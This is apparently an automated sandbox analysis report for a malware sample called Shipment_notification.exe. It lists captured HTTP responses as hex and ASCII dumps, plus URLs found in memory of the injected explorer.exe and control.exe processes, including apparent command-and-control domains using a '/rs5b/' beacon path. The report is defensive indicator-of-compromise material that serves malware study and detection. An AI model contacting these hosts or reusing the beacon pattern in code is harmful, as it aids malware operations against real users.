53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%;
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://carcosainvest.com/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 20 Mar 2023 15:49:55 GMTserver: LiteSpeedData Raw: 31 32 30 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b4 5b 5b 77 db b6 b2 7e b6 7f 05 4c af d8 62 0b 52 24 75 35 15 3a a7 3b 6d 9f da dd ae 5e 1e ce 4a 72 bc 20 12 94 90 90 04 37 00 5d 7c 54 ff f7 bd 00 90 e2 45 94 e5 ca a9 bd e2 88 c0 cc 37 83 c1 60 00 cc 50 17 6f af be ff e5 fd 1f ff fb eb 0f 60 29 d2 e4 fe f2 e2 ad fc 1f 24 28 5b 04 06 ce ac 3f 7f 37 54 23 46 d1 fd e5 c5 c5 db 14 0b 04 c2 25 62 1c 8b c0 f8 f3 8f 1f ad a9 01 fa 55 57 86 52 1c 18 6b 82 37 39 65 c2 00 21 cd 04 ce 44 60 6c 48 24 96 41 84 d7 24 c4 96 7a 80 80 64 44 10 94 58 3c 44 09 0e 5c 29 e9 e2 6d 42 b2 2f 80 e1 24 30 72 46 63 92 60 03 2c 19 8e 03 63 29 44 ce fd 7e 7f 91 e6 0b 9b b2 45 7f 1b 67 7d b7 e0 12 44 24 f8 fe 57 b4 c0 20 a3 02 c4 74 95 45 e0 e6 7a ea b9 ee 0c bc 47 2c a4 1c 91 6c 8d b9 78 db d7 b4 97 7a 2c 4a e1 5b 46 e7 54 f0 db bd ba b7 29 da 5a 24 45 0b 6c e5 0c cb e1 f8 09 62 0b 7c 2b c7 5a a9 78 1b 65 5c 12 c4 58 84 cb 5b ad e7 6d bf 1f d6 e5 d9 21 4d 5b 6c 06 4a 04 66 19 12 d8 00 e2 31 c7 81 81 f2 3c 21 21 12 84 66 7d c6 f9 b7 db 34 31 80 d2 33 30 1a da 83 1b 86 fe b3 a2 33 f0 23 c6 51 db 32 07 72 fb 31 c6 51 5f 4d 50 a5 f4 d7 90 fe 9e a6 29 ce 04 7f a1 1a 61 41 5e d7 87 87 8c e4 e2 fe 72 8d 18 c8 d1 02 27 e8 11 b3 07 f4 19 6d 57 2c 01 01 d8 cf f7 e1 a8 36 b9 85 a2 94 64 7d f5 d7 92 3c 76 be cc df 19 b3 16 da 22 a1 73 94 3c 64 34 0b b1 84 1c df c5 6e 3c 89 dc d0 3b 20 e5 98 ad 31 7b 10 24 95 94 ee 78 72 37 f0 26 83 bb 51 1b 92 f0 87 84 ac 15 da 01 46 8c 42 3c a7 f4 cb 03 89 a4 b4 83 7e 8e 85 20 d9 82 83 00 ec 8c 9c 72 f1 20 67 9f 1b fe 07 f5 64 40 43 1a c2 f8 04 0d 9c a1 79 82 1f 16 64 8d 99 e1 1b ae 01 8d 14 6d 1f d4 ba 31 7c d7 9d 38 d0 10 92 44 3c cc 19 46 5f 72 4a 32 61 f8 93 f1 14 1a 29 9d 93 04 37 da 07 63 07 1a 9c 44 78 8e 98 e1 c7 28 e1 18 1a 73 1a 3d 3e c4 54 f2 19 06 34 42 9a d0 b2 f3 a9 3d 6a 86 43 94 8b 70 f9 20 03 43 31 b6 b7 fd 62 0a df 72 f1 98 60 40 a2 c0 c8 69 be 4a 10 8b b7 96 36 bd a5 ba 78 e9 e6 02 6f 45 3f e4 dc b8 bf b4 39 11 d8 5a 62 14 61 06 76 73 14 7e 59 30 b9 68 2d a5 87 7f 1d ab 9f 2b 92 ca 38 82 32 31 7b 2a 58 d4 aa 00 08 ec 0a 42 77 22 7f 9f 23 04 72 90 16 27 ff 8f 7d 30 70 40 be 9d 81 12 2c c2 7a 0c 84 66 2d 40 d0 81 d8 a0 ae 81 ba a3 7c bb d7 2f a6 54 74 0f a9 d0 14 d4 c7 74 f9 b6 af 4c 74 5f 5b 9f 39 c3 09 45 07 ab 5b 0a e4 f6 82 d2 45 82 51 4e b8 0c 2c d2 98 ef 62 94 92 e4 31 f8 95 e6 39 c9 f8 9b c1 77 43 c7 79 33 79 ff b3 a4 c7 8c 21 a1 9b 0c 80 78 60 a8 50 65 80 90 51 ce 29 23 0b 92 05 06 ca 68 f6 98 d2 15 37 ea 6a d4 63 5b 3b d2 14 ba 70 81 04 09 a5 22 46 3d 2c 1a 39 c3 21 cd 32 1c 8a d3 8c c7 55 a9 b9 55 19 1f ac 0d dd 58 28 23 a9 0a 95 da bb 0e 9d cb
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 15:50:26 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 15:50:29 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: control.exe, 00000004.00000002.582622308.00000000056AC000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://carcosainvest.com/rs5b/?uyxvg=nOUSwineJuxPGPhQvt4EE68jEsCX
Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.53876.world
Source: explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.53876.world/rs5b/
Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.amirah.cfd
Source: explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.amirah.cfd/rs5b/
Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.339413260.0000000000921000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.577680371.000000000091F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.carcosainvest.com
Source: explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.carcosainvest.com/rs5b/
Source: Shipment_notification.exe, 00000000.00000003.316267483.000000000557E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.com
Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: Shipment_notification.exe, 00000000.00000003.316267483.000000000557E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.comn
Source: Shipment_notification.exe, 00000000.00000003.316267483.000000000557E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.como.
Source: Shipment_notification.exe, 00000000.00000003.316267483.000000000557E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.comx
Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.drkathleensanders.com
Source: explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.drkathleensanders.com/rs5b/
Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.emagrecarapido.store
Source: explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.emagrecarapido.store/rs5b/
Source: Shipment_notification.exe, 00000000.00000002.336768528.0000000000C67000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Shipment_notification.exe, 00000000.00000003.320681722.0000000005578000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlP
Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.320065711.00000000055AC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: Shipment_notification.exe, 00000000.00000002.336768528.0000000000C67000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comzana
Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: Shipment_notification.exe, 00000000.00000003.315344428.0000000005576000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.316084822.0000000005576000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.316210305.0000000005579000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.315510968.0000000005576000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.316267483.000000000557E000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.315947840.000000000557F000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.315357516.000000000557D000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: Shipment_notification.exe, 00000000.00000003.315947840.000000000557F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/b
Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Shipment_notification.exe, 00000000.00000003.315344428.0000000005576000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.315357516.000000000557D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cni9
Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Shipment_notification.exe, 00000000.00000003.322681699.00000000055AD000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.322630345.00000000055AD000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.322651512.0000000005577000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.322604070.00000000055AD000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.322780036.000000000557F000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.isabellagambitta.com
Source: explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.isabellagambitta.com/rs5b/
Source: control.exe, 00000004.00000002.582622308.0000000005388000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.isabellagambitta.com/rs5b/?uyxvg=CsXC0bU6YgbK4v/ikU
Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.kaj8tfjcmkn7.xyz
Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.kaj8tfjcmkn7.xyz/rs5b/
Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.kaj8tfjcmkn7.xyz/rs5b/Q
Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.locationsbormes.com
Source: explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.locationsbormes.com/rs5b/
Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.notebook-rucksack.com
Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.notebook-rucksack.com/rs5b/
Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.notebook-rucksack.com/rs5b/%
Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.peramid.xyz
Source: explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.peramid.xyz/rs5b/
Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.piergitarshoes.com
Source: explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.piergitarshoes.com/rs5b/
Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.rubyidentity.space
Source: explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.rubyidentity.space/rs5b/
Source: Shipment_notification.exe, 00000000.00000003.313400358.00000000055AD000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.313431498.00000000055AD000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: Shipment_notification.exe, 00000000.00000003.313400358.00000000055AD000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.313431498.00000000055AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com.Y
Source: Shipment_notification.exe, 00000000.00000003.313400358.00000000055AD000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.313431498.00000000055AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.comz
Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: control.exe, 00000004.00000002.582622308.000000000551A000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.searchvity.com/
Source: control.exe, 00000004.00000002.582622308.000000000551A000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.searchvity.com/?dn=
Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.starauctioneerspro.com
Source: explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.starauctioneerspro.com/rs5b/
Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.tcatelier.com
Source: explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.tcatelier.com/rs5b/
Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
